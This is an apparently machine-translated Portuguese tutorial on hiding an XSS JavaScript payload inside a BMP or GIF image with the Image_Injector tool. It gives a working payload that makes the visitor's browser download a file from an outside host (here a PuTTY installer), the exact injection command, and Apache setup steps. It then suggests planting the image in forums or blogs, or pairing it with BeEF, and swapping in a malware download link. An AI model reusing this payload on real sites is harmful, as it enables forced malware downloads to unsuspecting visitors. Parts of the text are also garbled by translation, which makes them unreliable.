Bem-vindo hoje falamos sobre Injetar algum código XSS malicioso em uma imagem.
Nós estaremos usando o Kali Linux para este tutorial, porém você pode usar um sistema operacional de sua escolha. Recomendamos usar o Linux. Se você ainda não possui Linux, pode baixar o Kali Linux a partir daqui .
O Cross Site Scripting é uma das vulnerabilidades mais comuns e poderosas na Web. O cross-site scripting attack é um ataque em aplicativos da web e software de navegador que pode permitir que um hacker injete scripts mal-intencionados para executar ações mal-intencionadas. O script malicioso é executado no lado do navegador, o que torna esse ataque muito poderoso, sigiloso e crítico.
Digamos que queríamos injetar uma carga útil Java Script diretamente em uma imagem, como conseguimos isso?
Então, sabemos que o operador do sistema / webmaster de uma plataforma permite a execução de scripts Java do mesmo domínio. O editor WYSIWYG permite a escrita de código HTML e o download de imagens. Um hacker poderia então criar um script Java Script malicioso e injetá-lo em uma imagem, ou criar uma imagem com uma carga útil injetada.
Neste tutorial, estaremos usando uma ferramenta Python chamada Image_Injector se você ainda não tiver Image_Injector, baixe-a do link abaixo.
DOWNLOAD IMAGE_INJECTOR
[sociallocker id = "968"] https://github.com/re4lity/Image_Injector [/ sociallocker]
Neste tutorial, vou injetar algum código XSS diretamente em uma imagem BMP, você também pode usar uma imagem Gif, se desejar.
Faça o download de uma imagem GIF ou BMP de sua escolha neste tutorial, usaremos uma imagem BMP.
Estarei usando um XSS Payload para forçar um usuário a baixar um arquivo de um local externo.
Exemplo de Java Payload do Script.
var link = document.createElement ('a'); link.href = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.68-installer.msi'; ' link.download = ''; document.body.appendChild (link); link.click ();
Este script de paz de Java cria uma âncora de HTML (marca <a>) que aponta para o arquivo a ser baixado (uma imagem no script de exemplo). Em seguida, a função click () do objeto "link".
Agora, precisamos injetar nossa carga útil do Java Script XSS na imagem BMP ou Gif, abra um novo terminal e navegue até o local de download do Script Image_Injector.
Injetor de imagem inclui dois scripts Bmp Inejctor e Gif Injector as opções são iguais para ambos os scripts.
Para começar, usaremos um dos seguintes comandos para executar o script e injetar o nosso Script Java. Se você precisar de ajuda, você pode usar a opção -h para listar as opções disponíveis.
Uso: gif_injector.py [-h] [-i] nome do arquivo js_payload
Uso: bmp_injector.py [-h] [-i] nome do arquivo js_payload
Exemplo: meu comando parece assim.
python bmp_injector.py -i bmp-128.bmp "var link = document.createElement ('a'); link.href = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.68-installer.msi'; link.download = ''; document.body.appendChild (link); link.click (); "
Iniciamos a nossa carga útil Java Script na imagem. Podemos encontrar o arquivo de saída no diretório do script. Também verá um modelo de script HTML do seu gif ou bmp gerado no diretório do script.
Se olharmos dentro do script HTML gerado, você poderá ver um modelo gerado para uso com a imagem injetada.
Agora vamos copiar o conteúdo do diretório do script e colocá-lo no diretório / var / www /.
Execute serviços apache2 usando o seguinte comando.
service apache2 start
Isso iniciará um servidor web Apache.
Agora, abra um novo navegador e execute a página HTML. Navegue para o seu endereço de IP local 127.0.0.1.
Agora você pode ver uma notificação de alerta de script Java no seu navegador, solicitando que você baixe um arquivo.
Agora vamos imaginar que possamos explorar o XSS com uma imagem? Podemos inseri-lo como um comentário? em um fórum, blog ou aplicativo da Web ou mesmo integrar a imagem GIF / Bmp maliciosa com um gancho BEeF ou de uma estrutura semelhante ... Os resultados podem ser devastadores.
Neste tutorial usamos um arquivo de download não mal-intencionado chamado Putty para usar como exemplo. Se um hacker incluísse um local de download para um malware ou vírus mal-intencionado, um invasor poderia então realizar novos ataques.
